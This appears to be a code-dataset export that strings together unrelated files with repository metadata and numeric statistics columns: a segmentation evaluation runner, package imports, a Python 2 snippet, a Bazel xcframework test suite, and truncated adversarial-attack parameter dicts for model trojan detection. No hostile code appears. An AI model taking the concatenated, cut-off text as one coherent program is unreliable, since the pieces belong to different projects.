|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_0_GridDistortion.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_1_GridDistortion.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_2_GridDistortion.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_3_GridDistortion.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_4_GridDistortion.yml",
]
for l in ls:
os.system(l)
| 49.090909
| 102
| 0.846296
| 80
| 540
| 5.3375
| 0.3
| 0.117096
| 0.140515
| 0.222482
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0
| 0.039293
| 0.057407
| 540
| 11
| 103
| 49.090909
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0.878004
| 0.64695
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7e66fd54ec4030243ee98fbe7fa0d7dbb704af29
| 79
|
py
|
Python
|
models/__init__.py
|
mengjian0502/EEE598_FinalProj
|
6e4b8d0ec79eb3e7aa982f85ecadb7f36cdd7a84
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
mengjian0502/EEE598_FinalProj
|
6e4b8d0ec79eb3e7aa982f85ecadb7f36cdd7a84
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
mengjian0502/EEE598_FinalProj
|
6e4b8d0ec79eb3e7aa982f85ecadb7f36cdd7a84
|
[
"MIT"
] | null | null | null |
from .mlp import *
from .cnn import *
from .cnn_q import *
from .cnn_b import *
| 19.75
| 20
| 0.708861
| 14
| 79
| 3.857143
| 0.428571
| 0.555556
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189873
| 79
| 4
| 21
| 19.75
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7e76ba567331748655a10d91424f5794a91edf62
| 22
|
py
|
Python
|
2017.TensorFlow&Python/2.python_syntax/test1.py
|
primetong/LearningCollectionOfWitt
|
a15dc8ac80618a3995c2b930c634b87ed8f1f0af
|
[
"MIT"
] | null | null | null |
2017.TensorFlow&Python/2.python_syntax/test1.py
|
primetong/LearningCollectionOfWitt
|
a15dc8ac80618a3995c2b930c634b87ed8f1f0af
|
[
"MIT"
] | 14
|
2020-06-30T20:52:56.000Z
|
2022-03-02T14:53:18.000Z
|
2017.TensorFlow&Python/2.python_syntax/test1.py
|
primetong/LearningCollectionOfWitt
|
a15dc8ac80618a3995c2b930c634b87ed8f1f0af
|
[
"MIT"
] | null | null | null |
a = 200 + 300
print a
| 7.333333
| 13
| 0.590909
| 5
| 22
| 2.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 0.318182
| 22
| 2
| 14
| 11
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
7e7783c980dfe609c2d5e8d775274e7581af31d2
| 24,193
|
bzl
|
Python
|
test/starlark_tests/apple_xcframework_tests.bzl
|
mattrobmattrob/rules_apple
|
4ebd7cc45edfe6c525c1553a0f5294895653c9df
|
[
"Apache-2.0"
] | null | null | null |
test/starlark_tests/apple_xcframework_tests.bzl
|
mattrobmattrob/rules_apple
|
4ebd7cc45edfe6c525c1553a0f5294895653c9df
|
[
"Apache-2.0"
] | null | null | null |
test/starlark_tests/apple_xcframework_tests.bzl
|
mattrobmattrob/rules_apple
|
4ebd7cc45edfe6c525c1553a0f5294895653c9df
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""xcframework Starlark tests."""
load(
":rules/common_verification_tests.bzl",
"archive_contents_test",
"bitcode_symbol_map_test",
)
load(
":rules/dsyms_test.bzl",
"dsyms_test",
)
load(
":rules/infoplist_contents_test.bzl",
"infoplist_contents_test",
)
load(
":rules/linkmap_test.bzl",
"linkmap_test",
)
def apple_xcframework_test_suite(name):
"""Test suite for apple_xcframework.
Args:
name: the base name to be used in things created by this macro
"""
infoplist_contents_test(
name = "{}_ios_plist_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
expected_values = {
"AvailableLibraries:0:LibraryIdentifier": "ios-arm64",
"AvailableLibraries:0:LibraryPath": "ios_dynamic_xcframework.framework",
"AvailableLibraries:0:SupportedArchitectures:0": "arm64",
"AvailableLibraries:0:SupportedPlatform": "ios",
"AvailableLibraries:1:LibraryIdentifier": "ios-x86_64-simulator",
"AvailableLibraries:1:LibraryPath": "ios_dynamic_xcframework.framework",
"AvailableLibraries:1:SupportedArchitectures:0": "x86_64",
"AvailableLibraries:1:SupportedPlatform": "ios",
"AvailableLibraries:1:SupportedPlatformVariant": "simulator",
"CFBundlePackageType": "XFWK",
"XCFrameworkFormatVersion": "1.0",
},
not_expected_keys = [
"AvailableLibraries:0:BitcodeSymbolMapsPath",
"AvailableLibraries:1:BitcodeSymbolMapsPath",
],
tags = [name],
)
infoplist_contents_test(
name = "{}_ios_fat_plist_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
expected_values = {
"AvailableLibraries:0:LibraryIdentifier": "ios-arm64_armv7",
"AvailableLibraries:0:LibraryPath": "ios_dynamic_lipoed_xcframework.framework",
"AvailableLibraries:0:SupportedArchitectures:0": "arm64",
"AvailableLibraries:0:SupportedArchitectures:1": "armv7",
"AvailableLibraries:0:SupportedPlatform": "ios",
"AvailableLibraries:1:LibraryIdentifier": "ios-i386_arm64_x86_64-simulator",
"AvailableLibraries:1:LibraryPath": "ios_dynamic_lipoed_xcframework.framework",
"AvailableLibraries:1:SupportedArchitectures:0": "i386",
"AvailableLibraries:1:SupportedArchitectures:1": "arm64",
"AvailableLibraries:1:SupportedArchitectures:2": "x86_64",
"AvailableLibraries:1:SupportedPlatform": "ios",
"AvailableLibraries:1:SupportedPlatformVariant": "simulator",
"CFBundlePackageType": "XFWK",
"XCFrameworkFormatVersion": "1.0",
},
not_expected_keys = [
"AvailableLibraries:0:BitcodeSymbolMapsPath",
"AvailableLibraries:1:BitcodeSymbolMapsPath",
],
tags = [name],
)
infoplist_contents_test(
name = "{}_ios_plist_bitcode_test".format(name),
apple_bitcode = "embedded",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
expected_values = {
"AvailableLibraries:0:LibraryIdentifier": "ios-arm64",
"AvailableLibraries:0:BitcodeSymbolMapsPath": "BCSymbolMaps",
"AvailableLibraries:1:LibraryIdentifier": "ios-x86_64-simulator",
},
not_expected_keys = [
"AvailableLibraries:1:BitcodeSymbolMapsPath",
],
tags = [name],
)
infoplist_contents_test(
name = "{}_ios_fat_plist_bitcode_test".format(name),
apple_bitcode = "embedded",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
expected_values = {
"AvailableLibraries:0:LibraryIdentifier": "ios-arm64_armv7",
"AvailableLibraries:0:BitcodeSymbolMapsPath": "BCSymbolMaps",
"AvailableLibraries:1:LibraryIdentifier": "ios-i386_arm64_x86_64-simulator",
},
not_expected_keys = [
"AvailableLibraries:1:BitcodeSymbolMapsPath",
],
tags = [name],
)
archive_contents_test(
name = "{}_ios_arm64_device_archive_contents_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
binary_test_file = "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/ios_dynamic_xcframework",
macho_load_commands_contain = ["name @rpath/ios_dynamic_xcframework.framework/ios_dynamic_xcframework (offset 24)"],
contains = [
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Headers/shared.h",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Headers/ios_dynamic_xcframework.h",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/ios_dynamic_xcframework",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Info.plist",
"$BUNDLE_ROOT/Info.plist",
],
tags = [name],
)
archive_contents_test(
name = "{}_ios_x86_64_sim_archive_contents_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/ios_dynamic_xcframework",
macho_load_commands_contain = ["name @rpath/ios_dynamic_xcframework.framework/ios_dynamic_xcframework (offset 24)"],
contains = [
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Headers/shared.h",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Headers/ios_dynamic_xcframework.h",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/ios_dynamic_xcframework",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Info.plist",
"$BUNDLE_ROOT/Info.plist",
],
tags = [name],
)
archive_contents_test(
name = "{}_ios_fat_device_archive_contents_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
binary_test_file = "$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework",
macho_load_commands_contain = ["name @rpath/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework (offset 24)"],
contains = [
"$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Headers/shared.h",
"$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Headers/ios_dynamic_lipoed_xcframework.h",
"$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework",
"$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Info.plist",
"$BUNDLE_ROOT/Info.plist",
],
tags = [name],
)
archive_contents_test(
name = "{}_ios_fat_sim_archive_contents_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
binary_test_file = "$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework",
macho_load_commands_contain = ["name @rpath/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework (offset 24)"],
contains = [
"$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Headers/shared.h",
"$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Headers/ios_dynamic_lipoed_xcframework.h",
"$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework",
"$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Info.plist",
"$BUNDLE_ROOT/Info.plist",
],
tags = [name],
)
dsyms_test(
name = "{}_device_dsyms_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
expected_dsyms = ["ios_dynamic_xcframework_ios_device.framework"],
architectures = ["arm64"],
tags = [name],
)
dsyms_test(
name = "{}_simulator_dsyms_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
expected_dsyms = ["ios_dynamic_xcframework_ios_simulator.framework"],
architectures = ["x86_64"],
tags = [name],
)
dsyms_test(
name = "{}_fat_device_dsyms_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
expected_dsyms = ["ios_dynamic_lipoed_xcframework_ios_device.framework"],
architectures = ["arm64", "armv7"],
tags = [name],
)
dsyms_test(
name = "{}_fat_simulator_dsyms_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
expected_dsyms = ["ios_dynamic_lipoed_xcframework_ios_simulator.framework"],
architectures = ["x86_64", "arm64", "i386"],
tags = [name],
)
linkmap_test(
name = "{}_device_linkmap_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
expected_linkmap_names = ["ios_dynamic_xcframework_ios_device"],
architectures = ["arm64"],
tags = [name],
)
linkmap_test(
name = "{}_simulator_linkmap_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
expected_linkmap_names = ["ios_dynamic_xcframework_ios_simulator"],
architectures = ["x86_64"],
tags = [name],
)
linkmap_test(
name = "{}_fat_device_linkmap_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
expected_linkmap_names = ["ios_dynamic_lipoed_xcframework_ios_device"],
architectures = ["arm64", "armv7"],
tags = [name],
)
linkmap_test(
name = "{}_fat_simulator_linkmap_test".format(name),
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
expected_linkmap_names = ["ios_dynamic_lipoed_xcframework_ios_simulator"],
architectures = ["x86_64", "arm64", "i386"],
tags = [name],
)
bitcode_symbol_map_test(
name = "{}_archive_contains_bitcode_symbol_maps_test".format(name),
bc_symbol_maps_root = "ios_dynamic_xcframework.xcframework/ios-arm64",
binary_paths = [
"ios_dynamic_xcframework.xcframework/ios-arm64/ios_dynamic_xcframework.framework/ios_dynamic_xcframework",
],
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework",
tags = [name],
)
bitcode_symbol_map_test(
name = "{}_fat_archive_contains_bitcode_symbol_maps_test".format(name),
bc_symbol_maps_root = "ios_dynamic_lipoed_xcframework.xcframework/ios-arm64_armv7",
binary_paths = [
"ios_dynamic_lipoed_xcframework.xcframework/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework",
],
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework",
tags = [name],
)
# Tests that minimum os versions values are respected by the embedded frameworks.
archive_contents_test(
name = "{}_ios_minimum_os_versions_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_min_ver_10",
plist_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_min_ver_10.framework/Info.plist",
plist_test_values = {
"MinimumOSVersion": "10.0",
},
tags = [name],
)
# Tests that options to override the device family (in this case, exclusively "ipad" for the iOS
# platform) are respected by the embedded frameworks.
archive_contents_test(
name = "{}_ios_exclusively_ipad_device_family_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_exclusively_ipad_device_family",
plist_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_exclusively_ipad_device_family.framework/Info.plist",
plist_test_values = {
"UIDeviceFamily:0": "2",
},
tags = [name],
)
# Tests that info plist merging is respected by XCFrameworks.
archive_contents_test(
name = "{}_multiple_infoplist_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_multiple_infoplists",
plist_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_multiple_infoplists.framework/Info.plist",
plist_test_values = {
"AnotherKey": "AnotherValue",
"CFBundleExecutable": "ios_dynamic_xcframework_multiple_infoplists",
},
tags = [name],
)
# Tests that resource bundles and files assigned through "data" are respected.
archive_contents_test(
name = "{}_dbg_resources_data_test".format(name),
build_type = "device",
compilation_mode = "dbg",
is_binary_plist = [
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist",
],
is_not_binary_plist = [
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist",
],
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_data_resource_bundle",
tags = [name],
)
archive_contents_test(
name = "{}_opt_resources_data_test".format(name),
build_type = "device",
compilation_mode = "opt",
is_binary_plist = [
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist",
],
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_data_resource_bundle",
tags = [name],
)
# Tests that resource bundles assigned through "deps" are respected.
archive_contents_test(
name = "{}_dbg_resources_deps_test".format(name),
build_type = "device",
compilation_mode = "dbg",
is_binary_plist = [
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist",
],
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_deps_resource_bundle",
tags = [name],
)
archive_contents_test(
name = "{}_opt_resources_deps_test".format(name),
build_type = "device",
compilation_mode = "opt",
is_binary_plist = [
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist",
"$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist",
],
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_deps_resource_bundle",
tags = [name],
)
# Tests that the exported symbols list works for XCFrameworks.
archive_contents_test(
name = "{}_exported_symbols_lists_stripped_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_stripped",
binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_stripped.framework/ios_dynamic_xcframework_stripped",
compilation_mode = "opt",
binary_test_architecture = "x86_64",
binary_contains_symbols = ["_anotherFunctionShared"],
binary_not_contains_symbols = ["_dontCallMeShared", "_anticipatedDeadCode"],
tags = [name],
)
# Tests that multiple exported symbols lists works for XCFrameworks.
archive_contents_test(
name = "{}_two_exported_symbols_lists_stripped_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_stripped_two_exported_symbols_lists",
binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_stripped_two_exported_symbols_lists.framework/ios_dynamic_xcframework_stripped_two_exported_symbols_lists",
compilation_mode = "opt",
binary_test_architecture = "x86_64",
binary_contains_symbols = ["_anotherFunctionShared", "_dontCallMeShared"],
binary_not_contains_symbols = ["_anticipatedDeadCode"],
tags = [name],
)
# Tests that dead stripping + exported symbols lists works for XCFrameworks just as it does for
# dynamic frameworks.
archive_contents_test(
name = "{}_exported_symbols_list_dead_stripped_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_dead_stripped",
binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_dead_stripped.framework/ios_dynamic_xcframework_dead_stripped",
compilation_mode = "opt",
binary_test_architecture = "x86_64",
binary_contains_symbols = ["_anotherFunctionShared"],
binary_not_contains_symbols = ["_dontCallMeShared", "_anticipatedDeadCode"],
tags = [name],
)
# Tests that generated swift interfaces work for XCFrameworks when a swift_library is included.
archive_contents_test(
name = "{}_swift_interface_generation_test".format(name),
build_type = "device",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_swift_xcframework",
contains = [
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/x86_64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/x86_64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/ios_dynamic_lipoed_swift_xcframework",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Info.plist",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/ios_dynamic_lipoed_swift_xcframework",
"$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/Info.plist",
"$BUNDLE_ROOT/Info.plist",
],
tags = [name],
)
# Test that the Swift generated header is propagated to the Headers visible within this iOS
# framework along with the swift interfaces and modulemap.
archive_contents_test(
name = "{}_swift_generates_header_test".format(name),
build_type = "simulator",
compilation_mode = "opt",
target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_swift_xcframework_with_generated_header",
contains = [
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Headers/SwiftFmwkWithGenHeader.h",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/x86_64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64_x86_64-simulator/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/x86_64.swiftinterface",
"$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Headers/SwiftFmwkWithGenHeader.h",
"$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Modules/module.modulemap",
"$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftdoc",
"$BUNDLE_ROOT/ios-arm64/SwiftFmwkWithGenHeader.framework/Modules/SwiftFmwkWithGenHeader.swiftmodule/arm64.swiftinterface",
],
tags = [name],
)
native.test_suite(
name = name,
tags = [name],
)
| 53.406181
| 193
| 0.720952
| 2,684
| 24,193
| 6.074143
| 0.084575
| 0.08158
| 0.094032
| 0.067902
| 0.892412
| 0.863951
| 0.822057
| 0.79562
| 0.758633
| 0.72275
| 0
| 0.02391
| 0.178853
| 24,193
| 452
| 194
| 53.524336
| 0.796738
| 0.067127
| 0
| 0.55814
| 0
| 0.020672
| 0.614032
| 0.579663
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002584
| false
| 0
| 0
| 0
| 0.002584
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e1ea1fc4dc5532c5dd8a59e420d43e1d27eee6c
| 14,390
|
py
|
Python
|
detection/defs.py
|
perspectalabs/Iliad-GIFT
|
64799bbe5895bc3875f22a9a94d1031216d92dd4
|
[
"MIT"
] | 1
|
2021-06-08T15:29:03.000Z
|
2021-06-08T15:29:03.000Z
|
detection/defs.py
|
perspectalabs/Iliad-GIFT
|
64799bbe5895bc3875f22a9a94d1031216d92dd4
|
[
"MIT"
] | null | null | null |
detection/defs.py
|
perspectalabs/Iliad-GIFT
|
64799bbe5895bc3875f22a9a94d1031216d92dd4
|
[
"MIT"
] | null | null | null |
################################# ATTACKS #######################################################
# att dict for untargeted L1 attack for round 3
r3_ut_l1_att = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 100, 'targeted': False}}
# att dict for random targeted L1 attack for round 3
r3_rt_l1_att = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 100, 'targeted': True, 'random_targets': True}}
# att dict for guessed targeted L1 attack for round 3
r3_gt_l1_att = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 100, 'targeted': True, 'random_targets': False}}
# att dict for untargeted filter attack for round 3
r3_ut_filt_att = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 100, 'targeted': False}}
# att dict for random targeted filter attack for round 3
r3_rt_filt_att = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 100, 'targeted': True, 'random_targets': True}}
# att dict for guessed targeted filter attack for round 3
r3_gt_filt_att = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 100, 'targeted': True, 'random_targets': False}}
# att dict for untargeted L1 attack for round 3, 300 images
r3_ut_l1_att_x3 = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 300, 'targeted': False}}
# att dict for random targeted L1 attack for round 3
r3_rt_l1_att_x3 = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 300, 'targeted': True, 'random_targets': True}}
# att dict for guessed targeted L1 attack for round 3
r3_gt_l1_att_x3 = {'type': 'l1', 'kwargs': {'eps': 2000., 'l1_sparsity': 0.99, 'nims': 300, 'targeted': True, 'random_targets': False}}
# att dict for untargeted filter attack for round 3
r3_ut_filt_att_x3 = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 300, 'targeted': False}}
# att dict for random targeted filter attack for round 3
r3_rt_filt_att_x3 = {'type': 'filt', 'kwargs': {'eps': 0.03, 'nims': 300, 'targeted': True, 'random_targets': True}}
# att dict for guessed targeted filter attack for round 3
